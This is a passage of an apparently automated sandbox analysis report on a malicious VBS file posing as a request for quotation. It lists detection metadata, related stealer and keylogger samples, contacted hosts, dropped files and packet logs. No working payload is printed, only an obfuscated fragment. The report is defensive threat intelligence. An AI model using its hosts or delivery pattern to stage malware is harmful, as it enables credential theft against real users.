                                              		pub-6346c84860d5480393a1799fb277dfdc.r2.devUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              207.241.227.240
                                              		ia600100.us.archive.orgUnited States
                                              		7941INTERNET-ARCHIVEUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1520409
                                              Start date and time:2024-09-27 10:42:55 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 20s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:RFQ 2024.09.26-89 vivecta.vbs
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winVBS@6/5@2/2
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 75%
                                              • Number of executed functions: 8
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 3740 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 5220 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: RFQ 2024.09.26-89 vivecta.vbs

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              04:43:52API Interceptor46x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.66.0.235http://pub-c1cf790adfb542e5864e6ddc9b3dfed6.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-c1cf790adfb542e5864e6ddc9b3dfed6.r2.dev/index.html
                                              http://pub-5075bfc09e394931b41ac90ce5947470.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-5075bfc09e394931b41ac90ce5947470.r2.dev/index.html
                                              http://pub-d287cacecb2747bbb10bf5f1dce1a9f8.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-d287cacecb2747bbb10bf5f1dce1a9f8.r2.dev/index.html
                                              http://pub-5c15f6de915d475d94825387734e7c48.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-5c15f6de915d475d94825387734e7c48.r2.dev/index.html
                                              http://pub-3a6f108c23dd495aa5ea6ac235309678.r2.dev/docline.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-3a6f108c23dd495aa5ea6ac235309678.r2.dev/cdn-cgi/images/icon-exclamation.png?1376755637
                                              http://pub-8e315825f4c1475c9f81d812a0ec1d22.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-8e315825f4c1475c9f81d812a0ec1d22.r2.dev/index.html
                                              http://pub-1d1c8ce698cc4584affc922ba1e4fa90.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-1d1c8ce698cc4584affc922ba1e4fa90.r2.dev/index.html
                                              http://pub-64538f6ee0d24d1ca85ae60e35a91f5d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-64538f6ee0d24d1ca85ae60e35a91f5d.r2.dev/index.html
                                              http://pub-ed63458a17e048da8587e5eb322d4fa7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-ed63458a17e048da8587e5eb322d4fa7.r2.dev/index.html
                                              http://pub-2569193321434588bad9fb7eb9d77a72.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • pub-2569193321434588bad9fb7eb9d77a72.r2.dev/index.html
                                              207.241.227.240AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                      LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                        hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                          wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                            TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                              BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  pub-6346c84860d5480393a1799fb277dfdc.r2.devMAX9814ETD+T SPLIT PACK).jsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 162.159.140.237
                                                                  ia600100.us.archive.orgAGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 207.241.227.240
                                                                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSZiraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.74.152
                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 162.159.129.233
                                                                  AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                  • 172.67.179.215
                                                                  175-33-26-24.HTA.htaGet hashmaliciousUnknownBrowse
                                                                  • 104.16.231.132
                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.97.3
                                                                  Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                  • 104.21.64.88
                                                                  QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                  • 104.21.64.88
                                                                  INTERNET-ARCHIVEUSAGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                  • 207.241.235.61
                                                                  sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                                                                  • 207.241.237.3
                                                                  LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                                  • 207.241.227.240
                                                                  wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 207.241.227.240
                                                                  TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 207.241.227.240

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0eRTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  http://home-103607.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235
                                                                  http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 207.241.227.240
                                                                  • 172.66.0.235

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulv4iZ:NllUg
                                                                  MD5:70F8065256CFB7FD75CA2A8F72BA3FA4
                                                                  SHA1:5A09385998FD735B5E5BD54F5901F3B180363A57
                                                                  SHA-256:F5DCDC55A3BF26D5E74BE7BA34D146984239C1CF7859C598B2B5A7C1A912755B
                                                                  SHA-512:CE4EEEC66F3553833690F46A08D17D9165D733753A2629998961A19EE57B94CF78961B1C3A0364434A943FF6DC964C5D15233224E8CC4E62507EA792313CC5D4
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:@...e.................................~..............@..........

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ehmoyid.0uz.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajuujzvq.qqk.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkzc0izb.yde.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he5jyahw.re5.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  Static File Info

                                                                  General

                                                                  File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Entropy (8bit):3.736172680569486
                                                                  TrID:
                                                                  • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                  • MP3 audio (1001/1) 32.22%
                                                                  • Lumena CEL bitmap (63/63) 2.03%
                                                                  • Corel Photo Paint (41/41) 1.32%
                                                                  File name:RFQ 2024.09.26-89 vivecta.vbs
                                                                  File size:500'440 bytes
                                                                  MD5:3cd94749b68b70e441c22d7b39b92baf
                                                                  SHA1:1c81975dae77ea2b7118eef79b8885e0961e04d8
                                                                  SHA256:eb32d01b3eeb25cf31b3cbe7a3ae26eb3e6b6aa1f1936bae80f3fd5b514220c3
                                                                  SHA512:cc6b0ef35bf753d916fa3f43d7c5f2eb91f182674fd0f49d887a48d509eb9c68d2d5b0bd12ccb3385e8d788541f3fb3b85ff53aa3d5ecccca61e20fd669aa591
                                                                  SSDEEP:12288:L0fiuTOa89Gt9++Um42HTiwqrdwVjulqpODr34Asc9JxXKP0rVNnR0gZg/Fh:nYtl4ciXWE9miK0j4
                                                                  TLSH:16B4F91135EA7008F1F32FA356F965E98FABB5662A36911E7048074F47A3E80CE51B73
                                                                  File Content Preview:..L.K.t.U.g.U.K.L.c.O.R.m.L.K.f.N.K.C.u.p.o.u.W.n.I.n.b.i.r.n.j.L.e.s.t.u.p.r.o.W.b.q.W.O.G.h.x.b.O.e.G.B.L.k.l.L.z.W.f.H.L.k.L.b.h.G.L.W.x.c.o.i.c. .=. .".q.K.A.K.f.i.J.q.a.i.L.U.U.P.a.P.L.W.G.C.Q.N.O.R.P.i.G.k.J.f.e.R.T.i.W.L.e.A.U.C.x.k.G.L.h.u.p.o.G.n

                                                                  File Icon

                                                                  Icon Hash:68d69b8f86ab9a86

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2024 10:43:54.045921087 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:54.045972109 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:54.046073914 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:54.056030035 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:54.056046009 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:54.679210901 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:54.679294109 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:54.683625937 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:54.683639050 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:54.683919907 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:54.696079016 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:54.743407011 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.000880957 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.000906944 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.000927925 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.000962973 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.000992060 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.001024961 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.001049042 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.025914907 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.025933981 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.026031017 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.026046991 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.026093960 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.026108027 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.093152046 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.093178988 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.093362093 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.093380928 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.093422890 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.138756990 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.138781071 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.138943911 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.138958931 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.139004946 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.207262039 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.207292080 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.207423925 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.207438946 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.207480907 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.208578110 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.208595991 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.208663940 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.208672047 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.208709002 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.276586056 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.276608944 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.276715994 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.276726961 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.276767969 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.348684072 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.348702908 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.348814964 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.348829985 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.348862886 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.348884106 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.348923922 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.348932028 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.348952055 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.348973989 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.415586948 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.415608883 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.415699005 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.415714979 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.415757895 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.415766954 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.417140007 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.417156935 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.417222023 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.417229891 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.417498112 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.483364105 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.483423948 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.483531952 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.483565092 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.483726978 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.759130001 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.759151936 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.759243011 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.759263039 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.759341002 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.759583950 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.759601116 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.759664059 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.759674072 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.759757042 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.763710976 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.763735056 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.763865948 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.763865948 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.763875008 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.763907909 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.764692068 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.764715910 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.764769077 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.764777899 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.764806986 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.764826059 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.768572092 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.768595934 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.768672943 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.768682957 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.768733978 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.769136906 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.769155025 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.769198895 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.769207954 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.769238949 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.769258022 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.769459009 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.769474030 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.769510031 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.769519091 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.769541979 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.769562960 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.770246029 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.770271063 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.770304918 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.770312071 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.770344973 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.770366907 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.774635077 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:55.827953100 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.827985048 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.828047991 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:55.828048944 CEST49699443192.168.2.7207.241.227.240
